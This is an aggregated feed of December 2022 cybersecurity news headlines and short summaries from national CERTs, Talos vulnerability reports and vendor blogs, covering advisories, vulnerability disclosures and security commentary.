Acaba de ser publicado mais um Relatório sobre o tema Sociedade, do Observatório de Cibersegurança, a quarta edição deste documento. Este Relatório estuda as atitudes, os comportamentos, a sensibilização e a educação relativamente à cibersegurança em Portugal, focando-se no fator humano envolvido na cibersegurança. Incide em particular sobre o ano de 2021, mas também apresenta, sempre que possível, dados e leituras relativas a 2022. A análise efetuada acompanha ainda os indicadores neste contexto que podem ser correlacionados com a Estratégia Nacional de Segurança do Ciberespaço 2019-2023. Termina com algumas recomendações que procuram mitigar as insuficiências encontradas na capacitação humana.Aceda ao documento completo aqui.Consulte a versão de leitura rápida aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135744/a-4-edicao-do-relatorio-sociedade-do-observatorio-de-ciberseguranca-foi-publicada
The National Cyber Security Centre Finland’s weekly review – 51/2022
2022-12-28T10:27:14Z | 1672223234

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 16–22 December 2022). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-512022
The National Cyber Security Centre Finland’s weekly review – 51/2022
2022-12-28T10:27:14Z | 1672223234

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 16–22 December 2022). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-512022
High Threat Security Alert (A22-12-15): Vulnerability in Linux Operating Systems
2022-12-28T04:00:00Z | 1672200000

A remote code execution vulnerability is found in the Linux kernel 5.15 through 5.19 with KSMBD enabled.

https://www.govcert.gov.hk/en/alerts_detail.php
Designing the Corporate WAN for the Security Needs of Tomorrow
2022-12-27T12:54:11Z | 1672145651

Technological innovation, an evolving threat landscape, and other factors mean that the security needs of tomorrow may be very different from those of yesterday. However, many organizations are still reliant on security models and solutions designed for IT architectures that are rapidly becoming extinct. Keeping pace with digital transformation and protecting against cyber threats requires... The post Designing the Corporate WAN for the Security Needs of Tomorrow appeared first on Cato Networks.

https://www.catonetworks.com/blog/designing-the-corporate-wan-for-the-security-needs-of-tomorrow/
How to share what you’ve learned from our audits
2022-12-22T20:10:39Z | 1671739839

Trail of Bits recently completed a security review of cURL, which is an amazing and ubiquitous tool for transferring data. We were really thrilled to see cURL founder and lead developer Daniel Stenberg write a blog post about the engagement and the report, and wanted to highlight some important things he pointed […]

https://blog.trailofbits.com/2022/12/22/curl-security-audit-threat-model/
A True Zero Trust Architecture Requires Security Integration
2022-12-22T13:46:46Z | 1671716806

While zero trust promises reduced exposure to security incidents and data breaches, as well as simplified compliance with regulatory requirements, deploying a zero trust architecture is not as simple as implementing least privilege access controls and replacing legacy virtual private networks (VPNs) with zero trust network access (ZTNA). Effective zero trust security acknowledges that strict... The post A True Zero Trust Architecture Requires Security Integration appeared first on Cato Networks.

https://www.catonetworks.com/blog/a-true-zero-trust-architecture-requires-security-integration/
Fast and accurate syntax searching for C and C++
2022-12-22T13:00:52Z | 1671714052

The naive approach to searching for patterns in source code is to use regular expressions; a better way is to parse the code with a custom parser, but both of these approaches have limitations. During my internship, I prototyped an internal tool called Syntex that does searching on Clang ASTs to avoid […]

https://blog.trailofbits.com/2022/12/22/syntax-searching-c-c-clang-ast/
OpenImageIO PSD format image file directory denial of service vulnerability
2022-12-22T00:00:00Z | 1671667200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1632
OpenImageIO TIFF tile pels decoding heap-based buffer overflow
2022-12-22T00:00:00Z | 1671667200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1633
OpenImageIO DDS scanline parsing code execution vulnerability
2022-12-22T00:00:00Z | 1671667200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1634
OpenImageIO Project OpenImageIO Image Output Close denial of service vulnerability
2022-12-22T00:00:00Z | 1671667200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1653
OpenImageIO DDS native tile reading denial of service vulnerability
2022-12-22T00:00:00Z | 1671667200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1635
OpenImageIO Exif out-of-bounds write vulnerability
2022-12-22T00:00:00Z | 1671667200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1636
OpenImageIO TIFF IPTC decoding information disclosure vulnerability
2022-12-22T00:00:00Z | 1671667200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1643
OpenImageIO TGA Format Stack Buffer Overflow Vulnerability
2022-12-22T00:00:00Z | 1671667200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1628
OpenImageIO Project OpenImageIO DPXOutput::close() information disclosure vulnerability
2022-12-22T00:00:00Z | 1671667200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1651
OpenImageIO Project OpenImageIO DPXOutput::close() denial of service vulnerability
2022-12-22T00:00:00Z | 1671667200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1652
OpenImageIO TIFF file string field information disclosure vulnerability
2022-12-22T00:00:00Z | 1671667200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1627
OpenImageIO TIFF file IPTC data information disclosure vulnerability
2022-12-22T00:00:00Z | 1671667200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1631
OpenImageIO PSD thumbnail resource code execution vulnerability
2022-12-22T00:00:00Z | 1671667200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1626
OpenImageIO Project OpenImageIO IFFOutput wild write vulnerability
2022-12-22T00:00:00Z | 1671667200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1656
OpenImageIO Project OpenImageIO IFFOutput channel interleaving information disclosure vulnerability
2022-12-22T00:00:00Z | 1671667200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1654
OpenImageIO Project OpenImageIO IFFOutput alignment padding memory corruption vulnerability
2022-12-22T00:00:00Z | 1671667200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1655
OpenImageIO Project OpenImageIO ZfileOutput::close() denial of service vulnerability
2022-12-22T00:00:00Z | 1671667200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1657
OpenImageIO RLE encoded BMP image out-of-bounds write vulnerability
2022-12-22T00:00:00Z | 1671667200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1630
OpenImageIO RLA format rle span out-of-bounds read vulnerability
2022-12-22T00:00:00Z | 1671667200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1629
Ghost user enumeration vulnerablity
2022-12-21T00:00:00Z | 1671580800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1625
Ghost unauthorized newsletter modification vulnerability
2022-12-21T00:00:00Z | 1671580800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1624
The National Cyber Security Centre Finland’s weekly review – 50/2022
2022-12-20T14:26:04Z | 1671546364

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 9–15 December 2022). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-502022
The National Cyber Security Centre Finland’s weekly review – 50/2022
2022-12-20T14:26:04Z | 1671546364

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 9–15 December 2022). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-502022
Boost Your Page Load Times with Performance Engineering, Part 1 of 5
2022-12-20T14:00:00Z | 1671544800

Get up to speed with web performance, the Core Web Vitals, and other metrics to increase your revenue and rank your page higher on Google.

https://www.akamai.com/blog/developers/performance-engineering-part-1-of-5
What child is this?
2022-12-20T13:00:25Z | 1671541225

A Primer on Process Reparenting in Windows. Process reparenting is a technique used in Microsoft Windows to create a child process under a different parent process than the one making the call to CreateProcess. Malicious actors can use this technique to evade security products or break process ancestry ties, making detection more […]

https://blog.trailofbits.com/2022/12/20/process-reparenting-microsoft-windows/
New Critical Vulnerability Underscores the Need for Virtual Patching
2022-12-20T10:03:28Z | 1671530608

A new vulnerability underscores the need for virtual patching. The vulnerability, found in FortiOS, would allow a Remote Code Execution (RCE) attack on multiple firewall products as well as FortiGate SSL VPN. The vulnerability has reportedly already been exploited by threat actors. Fortinet has issued a patch for this vulnerability. The vulnerability, which was initially... The post New Critical Vulnerability Underscores the Need for Virtual Patching appeared first on Cato Networks.

https://www.catonetworks.com/blog/new-critical-vulnerability-underscores-the-need-for-virtual-patching/
Riigiportaal eesti.ee on nüüd ühtses keskkonnas
2022-12-20T07:29:16Z | 1671521356

Riigiportaal www.eesti.ee sulges vana nn rohelise portaali ning on tänasest ühtses sinises keskkonnas.

https://ria.ee/uudised/riigiportaal-eestiee-nuud-uhtses-keskkonnas
OpenStack Kolla sudo privilege escalation vulnerability
2022-12-20T00:00:00Z | 1671494400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1589
OpenStack oslo.privsep privilege escalation vulnerability
2022-12-20T00:00:00Z | 1671494400

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1599
Publicado o Boletim de dezembro de 2022 do Observatório de Cibersegurança
2022-12-20T00:00:00Z | 1671494400

O Boletim do Observatório de Cibersegurança do CNCS de dezembro é dedicado ao tema da Inteligência Artificial no contexto da cibersegurança, nomeadamente a sua utilização por agentes de ameaça, mas também pelos profissionais de cibersegurança. A importância da regulamentação e da segurança por conceção são igualmente aspetos abordados neste número. Como sempre, o Boletim partilha notícias e documentos considerados de interesse.Aceda ao documento aqui.

https://dyn.cncs.gov.pt/pt/detalhe/art/135743/publicado-o-boletim-de-dezembro-de-2022-do-observatorio-de-ciberseguranca
Emulating KmsdBot?s Command and Control and Examining Its Attack Traffic
2022-12-19T15:00:00Z | 1671462000

Read about the global impact of KmsdBot, a botnet that hit our honeypot earlier this year, and why the evidence is pointing toward it being a DDoS for hire.

https://www.akamai.com/blog/security-research/kmsdbot-part-three-examining-attack-traffic
Messaging Malware and Mobile Anti-Abuse Working Group (M3AAWG) and Forum of Incident Response and Security Teams (FIRST) Join Forces to Address Global Internet and Security Issues
2022-12-19T13:00:00Z | 1671454800

The Messaging Malware and Mobile Anti-Abuse Working Group (M3AAWG) and Forum of Incident Response and Security Teams (FIRST) announced today they will work together to combat growing Internet abuse and cybersecurity issues.

https://www.first.org/newsroom/releases/20221219
Messaging Malware and Mobile Anti-Abuse Working Group (M3AAWG) and Forum of Incident Response and Security Teams (FIRST) Join Forces to Address Global Internet and Security Issues
2022-12-19T13:00:00Z | 1671454800

The Messaging Malware and Mobile Anti-Abuse Working Group (M3AAWG) and Forum of Incident Response and Security Teams (FIRST) announced today they will work together to combat growing Internet abuse and cybersecurity issues.

https://www.first.org/newsroom/releases/20221219
Late autumn winds kept cyber weather chilly in November
2022-12-19T11:46:02Z | 1671450362

The cyber phenomena in November kept cyber weather chilly in the late autumn. The number of ransomware has increased in the autumn both in Finland and abroad. Extortion scams have employed new themes. A short sunny spell was seen when the Council of the European Union adopted the new NIS2 Directive that will improve cyber security in the EU in the years to come.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_11/2022
Late autumn winds kept cyber weather chilly in November
2022-12-19T11:46:02Z | 1671450362

The cyber phenomena in November kept cyber weather chilly in the late autumn. The number of ransomware has increased in the autumn both in Finland and abroad. Extortion scams have employed new themes. A short sunny spell was seen when the Council of the European Union adopted the new NIS2 Directive that will improve cyber security in the EU in the years to come.

https://www.kyberturvallisuuskeskus.fi/en/ajankohtaista/kybersaa_11/2022
Security Alert (A22-12-13): Multiple Vulnerabilities in Microsoft Edge
2022-12-19T04:00:00Z | 1671422400

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-12-14): Multiple Vulnerabilities in VMware vRealize Operations
2022-12-19T04:00:00Z | 1671422400

VMware has published a security advisory to address multiple vulnerabilities in VMware vRealize Operations.

https://www.govcert.gov.hk/en/alerts_detail.php
In-Memory Execution in macOS: the Old and the New
2022-12-19T00:00:00Z | 1671408000

https://rtx.meta.security/post-exploitation/2022/12/19/In-Memory-Execution-in-macOS.html
CVE-2022-4062
2022-12-19T00:00:00Z | 1671408000

CWE-285: Improper Authorization A vulnerability exists that could cause unauthorized access to certain software functions when an attacker gets access to localhost interface of the EcoStruxure Power Commission application.

https://claroty.com/team82/disclosure-dashboard/cve-2022-4062
Careful Workload Placement Can Create Cloud Cost Savings
2022-12-16T14:00:00Z | 1671199200

Optimizing the cost-effectiveness of cloud infrastructure requires the careful placement of workloads in the environments best suited to their execution.

https://www.akamai.com/blog/cloud/careful-workload-placement-can-create-cloud-cost-savings
Smart Christmas shopping – remember information security
2022-12-16T13:43:42Z | 1671198222

Thinking about buying someone a smart toy for Christmas? Before buying, remember to check the device's information security features.

https://www.kyberturvallisuuskeskus.fi/en/news/smart-christmas-shopping-remember-information-security
Smart Christmas shopping – remember information security
2022-12-16T13:43:42Z | 1671198222

Thinking about buying someone a smart toy for Christmas? Before buying, remember to check the device's information security features.

https://www.kyberturvallisuuskeskus.fi/en/news/smart-christmas-shopping-remember-information-security
Information security voucher became hugely popular
2022-12-16T13:41:47Z | 1671198107

The Finnish Transport and Communications Agency Traficom has accepted applications for support for the development of information security, also known as ‘information security vouchers’, since the beginning of December. The total amount covered by the applications already exceeds the amount of funding available.

https://www.kyberturvallisuuskeskus.fi/en/news/information-security-voucher-became-hugely-popular
Information security voucher became hugely popular
2022-12-16T13:41:47Z | 1671198107

The Finnish Transport and Communications Agency Traficom has accepted applications for support for the development of information security, also known as ‘information security vouchers’, since the beginning of December. The total amount covered by the applications already exceeds the amount of funding available.

https://www.kyberturvallisuuskeskus.fi/en/news/information-security-voucher-became-hugely-popular
Clear increase in the number of denial-of-service attacks in December
2022-12-16T13:34:33Z | 1671197673

The National Cyber Security Centre Finland (NCSC-FI) has received unusually many reports about denial-of-service (DoS) attacks in December. Most of the attacks have not caused any noticeable harm.

https://www.kyberturvallisuuskeskus.fi/en/news/clear-increase-number-denial-service-attacks-december
Clear increase in the number of denial-of-service attacks in December
2022-12-16T13:34:33Z | 1671197673

The National Cyber Security Centre Finland (NCSC-FI) has received unusually many reports about denial-of-service (DoS) attacks in December. Most of the attacks have not caused any noticeable harm.

https://www.kyberturvallisuuskeskus.fi/en/news/clear-increase-number-denial-service-attacks-december
Akamai?s Perspective on December?s Patch Tuesday 2022
2022-12-16T06:00:00Z | 1671170400

Every Patch Tuesday stirs up the community. See Akamai's December insights and recommendations on what to focus on, and patch, patch, patch!

https://www.akamai.com/blog/security-research/akamai-perspective-patch-tuesday-december-2022
3 Lessons on Blocking Cyber Attacks for the Education Sector
2022-12-15T15:11:06Z | 1671117066

The education sector is often targeted in cyber attacks due to having less cybersecurity resources. Watch our webinar to learn three lessons about blocking cyber attacks in the education sector.

https://www.ironnet.com/resource-library/3-lessons-on-blocking-cyber-attacks-for-the-education-sector
Why Do I Need Zero Trust on My Endpoint If I Have EDR/XDR?
2022-12-15T14:00:00Z | 1671112800

Do you need a Zero Trust solution if you have EDR/XDR installed? The short answer is yes ? you need both.

https://www.akamai.com/blog/security/you-need-both-zero-trust-and-edr-xdr
How I gave ManticoreUI a makeover
2022-12-15T13:00:23Z | 1671109223

During my internship at Trail of Bits, I explored the effectiveness of symbolic execution for finding vulnerabilities in native applications ranging from CTF challenges to popular open source libraries like image parsers, focusing on finding ways to enhance ManticoreUI. It is a powerful tool that improves accessibility to symbolic execution and vulnerability […]

https://blog.trailofbits.com/2022/12/15/manitcoreui-symbolic-execution-gui/
An Inside Look at Life Before and After Deploying SASE
2022-12-15T10:37:55Z | 1671100675

SASE (Secure Access Service Edge) is an enterprise networking and security service that converges SD-WAN with multiple security functions – including FWaaS, CASB, DLP, SWG, and ZTNA – into a converged, cloud-native service that is manageable, optimized, secure and easy to use.But what does life after SASE really look like when implemented in an enterprise?... The post An Inside Look at Life Before and After Deploying SASE appeared first on Cato Networks.

https://www.catonetworks.com/blog/an-inside-look-at-life-before-and-after-deploying-sase/
The National Cyber Security Centre Finland’s weekly review – 49/2022
2022-12-15T08:01:11Z | 1671091271

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 2–8 December 2022). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-492022
The National Cyber Security Centre Finland’s weekly review – 49/2022
2022-12-15T08:01:11Z | 1671091271

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 2–8 December 2022). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-492022
You?ve Crossed the Line ? Disturbing a Host?s Rest
2022-12-14T15:00:00Z | 1671030000

Akamai researchers explore two new vulnerabilities that can be exploited to lead to denial-of-service attacks against container and session services.

https://www.akamai.com/blog/security-research/msrpc-lsm-cve-disturbing-hosts-rest
High Threat Security Alert (A22-12-07): Multiple Vulnerabilities in Microsoft Products(December 2022)
2022-12-14T04:00:00Z | 1670990400

Microsoft has released security updates addressing multiple vulnerabilities which affect several Microsoft products or components.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A22-12-08): Multiple Vulnerabilities in Apple iOS and iPadOS
2022-12-14T04:00:00Z | 1670990400

Apple has released iOS 15.7.2, iOS 16.2, iPadOS 15.7.2 and iPadOS 16.2 to fix the vulnerabilities in various Apple devices.

https://www.govcert.gov.hk/en/alerts_detail.php
High Threat Security Alert (A22-12-09): Vulnerability in Citrix Products
2022-12-14T04:00:00Z | 1670990400

Citrix released a security advisory to address a remote code execution vulnerability in Citrix Application Delivery Controller and Citrix Gateway.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-12-10): Multiple Vulnerabilities in VMware Products
2022-12-14T04:00:00Z | 1670990400

VMware has published security advisories to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-12-11): Multiple Vulnerabilities in Google Chrome
2022-12-14T04:00:00Z | 1670990400

Google released a security update to address multiple vulnerabilities in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-12-12): Multiple Vulnerabilities in Firefox
2022-12-14T04:00:00Z | 1670990400

Mozilla has published the advisories (MFSA2022-51 and MFSA2022-52) to address multiple vulnerabilities in Firefox browser.

https://www.govcert.gov.hk/en/alerts_detail.php
Sonicwall Capture Client Local Privilege Escalation via SentinelOne Agent (Aikido)
2022-12-13T19:24:44Z | 1670959484

An arbitrary file deletion vulnerability (Aikido) in Sonicwall Capture Client via SentinelOne Agent could allow a local attacker to escalate privileges and delete files. The exploit was confirmed to work with 6 vulnerable EDR products, including the SentinelOne Agent for Windows.Please note: an attacker must first obtain low-privileged access on the target system in order to exploit this vulnerability. CVE: N/A Last updated: Dec. 13, 2022, 7:24 p.m.

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0025
Measuring User Experience with Real User Data
2022-12-13T14:00:00Z | 1670940000

Use data from real users to improve the user experience (UX) of your site or app, and draw on real behavior and outcomes for effective UX decision-making.

https://www.akamai.com/blog/performance/measuring-user-experience-with-real-user-data
Akamai Welcomed Partners to a Memorable Asia-Pacific and Japan Partner Summit
2022-12-13T14:00:00Z | 1670940000

Learn about the recent Akamai APJ Partner Summit 2022, including new revenue opportunities for our partners ? and the awards we gave.

https://www.akamai.com/blog/news/akamai-apj-partner-summit
Manticore GUIs made easy
2022-12-13T13:00:04Z | 1670936404

Trail of Bits maintains Manticore, a symbolic execution engine that can analyze smart contracts and native binaries. While symbolic execution is a powerful technique that can augment the vulnerability discovery process, it requires some base domain knowledge and thus has its own learning curve. Given the plethora […]

https://blog.trailofbits.com/2022/12/13/manticore-gui-plugin-binary-ninja-ghidra/
The 5-Step Action Plan to Becoming CISO
2022-12-13T11:47:00Z | 1670932020

If you're a Security professional looking to become a CISO, then you've come to the right place. This five-step guide is your plan of action to becoming CISO, even if you have no experience. The post The 5-Step Action Plan to Becoming CISO appeared first on Cato Networks.

https://www.catonetworks.com/blog/from-is-pro-to-ciso/
Artificial intelligence will shape future cyberattacks
2022-12-13T07:04:47Z | 1670915087

How will artificial intelligence (AI) change the nature of cyberattacks? What kinds of threats will AI pose for cyber security in the next few years? What aspects are important to consider when preparing for the threats?

https://www.kyberturvallisuuskeskus.fi/en/news/artificial-intelligence-will-shape-future-cyberattacks
Artificial intelligence will shape future cyberattacks
2022-12-13T07:04:47Z | 1670915087

How will artificial intelligence (AI) change the nature of cyberattacks? What kinds of threats will AI pose for cyber security in the next few years? What aspects are important to consider when preparing for the threats?

https://www.kyberturvallisuuskeskus.fi/en/news/artificial-intelligence-will-shape-future-cyberattacks
High Threat Security Alert (A22-12-06): Vulnerability in Fortinet FortiOS
2022-12-13T04:00:00Z | 1670904000

Fortinet released security advisory to address a remote code execution vulnerability in Fortinet FortiOS.

https://www.govcert.gov.hk/en/alerts_detail.php
VMware vCenter Server Content Library denial of service vulnerability
2022-12-13T00:00:00Z | 1670889600

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1588
CVE-2022-40264
2022-12-13T00:00:00Z | 1670889600

CWE-22: Path Traversal A crafted PKGX file could force ICONICS Workbench to write an arbitrary file through path traversal.

https://claroty.com/team82/disclosure-dashboard/cve-2022-40264
How to proactively detect cyber attack infrastructure
2022-12-12T22:46:08Z | 1670885168

This white paper illustrates how to proactively detect malicious command and control (C2) infrastructure as it is being set up --before a cyber attack. This block-and-tackle capability using IronRadar threat detection and response integrates directly in an organization's existing tool stack.

https://www.ironnet.com/resource-library/how-to-proactively-detect-cyber-attack-infrastructure
Gartner Names Top I&O Trends for 2023
2022-12-12T16:24:19Z | 1670862259

Gartner has just issued a press release announcing its Top Trends Impacting Infrastructure and Operations for 2023. Among the six trends that will have significant impact over the next 12 to 18 months Gartner named the Secure Access Service Edge (SASE), sustainable technology, and heated skills competition. Below is a discussion of these trends and... The post Gartner Names Top I&O Trends for 2023 appeared first on Cato Networks.

https://www.catonetworks.com/blog/gartner-names-top-io-trends-for-2023/
Security Alert (A22-12-05): Multiple Vulnerabilities in VMware Products
2022-12-12T04:00:00Z | 1670817600

VMware has published a security advisory to address multiple vulnerabilities in VMware products.

https://www.govcert.gov.hk/en/alerts_detail.php
New Year, New Threats: What You Need to Know For Cybersecurity in 2023
2022-12-09T17:15:44Z | 1670606144

In this webinar, Joey Fitzpatrick, Lead Threat Analysis at IronNet, shared tips and tools to prevent impacts to mission-critical functions by blocking threats before a cyber-attack. As you prepare for 2023, do you have a comprehensive attack surface management plan to proactively stop cyber threats? Learn best practices to strengthen your cybersecurity posture and how IronNet's elite threat hunters can help you prepare.

https://www.ironnet.com/resource-library/new-year-new-threats-what-you-need-to-know-for-cybersecurity-in-2023
Olukord küberruumis – november 2022
2022-12-09T10:15:36Z | 1670580936

Novembris registreerisime 288 mõjuga intsidenti, mis on viimase poole aasta kõige kõrgem näitaja.

https://ria.ee/uudised/olukord-kuberruumis-november-2022
RIA teeb 9. detsembri õhtul andmekeskuse uuenduse
2022-12-09T08:33:03Z | 1670574783

RIA alustab täna, 9. detsembri õhtul kell 17 oma andmekeskuse seadmete uuendamist, et tõsta andmekeskuse võimekusi.

https://ria.ee/uudised/ria-teeb-9-detsembri-ohtul-andmekeskuse-uuenduse
Valitsus kehtestas Eesti infoturbestandardi, mis aitab juhtida riske ja kaitsta infosüsteeme
2022-12-09T07:43:43Z | 1670571823

Tänase valitsuse määrusega kehtestati uus Eesti infoturbestandard (E-ITS), mis põhineb risikjuhtimisel ja aitab määrata parimad infosüsteemide kaitsemeetmed. Tegemist on nõuete ja parimate rahvusvaheliste praktikate kogumiga, mis on justkui joonlaud mõõtmaks ning juhtimaks IKT turvalisuse tegevusi.

https://ria.ee/uudised/valitsus-kehtestas-eesti-infoturbestandardi-mis-aitab-juhtida-riske-ja-kaitsta-infosusteeme
An Overview of MS-RPC and Its Security Mechanisms
2022-12-08T15:00:00Z | 1670511600

MS-RPC is a widely used protocol, but not much security research is done on it. In this blog, see an overview of MS-RPC and their security mechanisms.

https://www.akamai.com/blog/security-research/msrpc-security-mechanisms
Fireside Chat About Network Security With ChatGPT (AI)
2022-12-08T14:05:13Z | 1670508313

In one artificially cold evening, I invited myself to an intimate fireside chat with my new BFF, ChatGPT, who I now call CG in short.  Being a new artificial intelligence open to help humans as myself understand the universe we live in, I wanted to pick its brain (or should it be brains, in plural?)... The post Fireside Chat About Network Security With ChatGPT (AI) appeared first on Cato Networks.

https://www.catonetworks.com/blog/fireside-chat-about-network-security-with-chatgpt-ai/
Hybrid fuzzing: Sharpening the spikes of Echidna
2022-12-08T13:00:36Z | 1670504436

Smart contract fuzzing is an effective bug-finding technique that is largely used at Trail Of Bits during audits. During my internship at Trail of Bits, I contributed to expand our fuzzing capabilities by working on Hybrid Echidna, a “hybrid fuzzer” that couples our smart contract fuzzer, Echidna, with […]

https://blog.trailofbits.com/2022/12/08/hybrid-echidna-fuzzing-optik-maat/
The National Cyber Security Centre Finland’s weekly review – 48/2022
2022-12-08T09:18:07Z | 1670491087

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 25 November–1 December 2022). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-482022
The National Cyber Security Centre Finland’s weekly review – 48/2022
2022-12-08T09:18:07Z | 1670491087

This is the weekly review of the National Cyber Security Centre Finland (NCSC-FI) (reporting period 25 November–1 December 2022). The purpose of the weekly review is to share information about current cyber phenomena. The weekly review is intended for a wide audience, from cyber security specialists to regular citizens.

https://www.kyberturvallisuuskeskus.fi/en/news/national-cyber-security-centre-finlands-weekly-review-482022
Is Stopping a Ransomware Attack More Important Than Preventing One?
2022-12-07T14:00:00Z | 1670421600

Microsegmentation can stop a ransomware attack from moving laterally across your organization and prevent malicious behavior.

https://www.akamai.com/blog/security/stopping-ransomware-attacks-with-microsegmentation
Security Alert (A22-12-04): Multiple Vulnerabilities in Fortinet Products
2022-12-07T04:00:00Z | 1670385600

Fortinet released security advisories to address multiple vulnerabilities in Fortinet products.

https://www.govcert.gov.hk/en/alerts_detail.php
PowerISO VHD File Format parsing CXSPARSE record memory corruption vulnerability
2022-12-07T00:00:00Z | 1670371200

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1644
Elevate Streaming Media with EdgeWorkers and Macrometa Stream Workers
2022-12-06T14:00:00Z | 1670335200

Elevate players? gaming experiences with Akamai EdgeWorkers and Macrometa Stream Workers.

https://www.akamai.com/blog/cloud/elevate-streaming-media-with-edgeworkers-and-stream-workers
Pühade eel saadetakse Omnivat ja Eesti pankasid matkivaid sõnumeid
2022-12-06T12:54:53Z | 1670331293

Viimastel nädalatel on RIA saanud kümneid teateid Ominivat matkivat libakirjadest. Inimesed andsid märku ka panku jäljendavatest võlts-SMSidest. Mõlema pettuse eesmärk on koguda inimeste ja nende pangakaartide andmeid ja võimalusel varastada raha.

https://ria.ee/uudised/puhade-eel-saadetakse-omnivat-ja-eesti-pankasid-matkivaid-sonumeid
High Threat Security Alert (A22-12-02): Multiple Vulnerabilities in Microsoft Edge
2022-12-06T04:00:00Z | 1670299200

Microsoft released a security update to address multiple vulnerabilities in Microsoft Edge.

https://www.govcert.gov.hk/en/alerts_detail.php
Security Alert (A22-12-03): Multiple Vulnerabilities in Android
2022-12-06T04:00:00Z | 1670299200

Google has released Android Security Bulletin December 2022 to fix multiple security vulnerabilities in Android operating system.

https://www.govcert.gov.hk/en/alerts_detail.php
NVIDIA D3D10 Driver Shader Functionality MOV instruction memory corruption vulnerability
2022-12-06T00:00:00Z | 1670284800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1603
NVIDIA D3D10 Driver Shader Functionality DCL_INDEXRANGE instruction memory corruption vulnerability
2022-12-06T00:00:00Z | 1670284800

https://talosintelligence.com/vulnerability_reports/TALOS-2022-1604
Cloud-Based Security is Well-Suited for Zero Trust Architectures
2022-12-05T15:20:10Z | 1670253610

As companies look to reduce corporate risk, protect against data breaches and other incidents, and maintain regulatory compliance, a zero trust security strategy provides significant advantages when compared to legacy models. However, zero trust is only effective if it is enforced and supported by strong security solutions. For most organizations, cloud-based solutions are the only... The post Cloud-Based Security is Well-Suited for Zero Trust Architectures appeared first on Cato Networks.

https://www.catonetworks.com/blog/cloud-based-security-is-well-suited-for-zero-trust-architectures/
Not Every Cloud Is Meant for Every Workload
2022-12-05T14:00:00Z | 1670248800

Understanding which cloud platforms are the best fit for which workloads can maximize your return on investment and your customers? output.

https://www.akamai.com/blog/cloud/not-every-cloud-is-meant-for-every-workload
High Threat Security Alert (A22-12-01): Vulnerability in Google Chrome
2022-12-05T04:00:00Z | 1670212800

Google released a security update to address a vulnerability in Google Chrome.

https://www.govcert.gov.hk/en/alerts_detail.php
Ensuring Success with SSE: Your Helpful SSE RFP/RFI Template
2022-12-04T11:05:47Z | 1670151947

The post Ensuring Success with SSE: Your Helpful SSE RFP/RFI Template appeared first on Cato Networks.

https://www.catonetworks.com/resources/ensuring-success-with-sse-rfp-rfi-template/
A Closer Look at Ransomware Attack Trends in APJ
2022-12-01T14:00:00Z | 1669903200

Read about the surge of ransomware as a service (RaaS) cyberattack trends in APJ, and the infamous (and prolific) Conti group?s role in them.

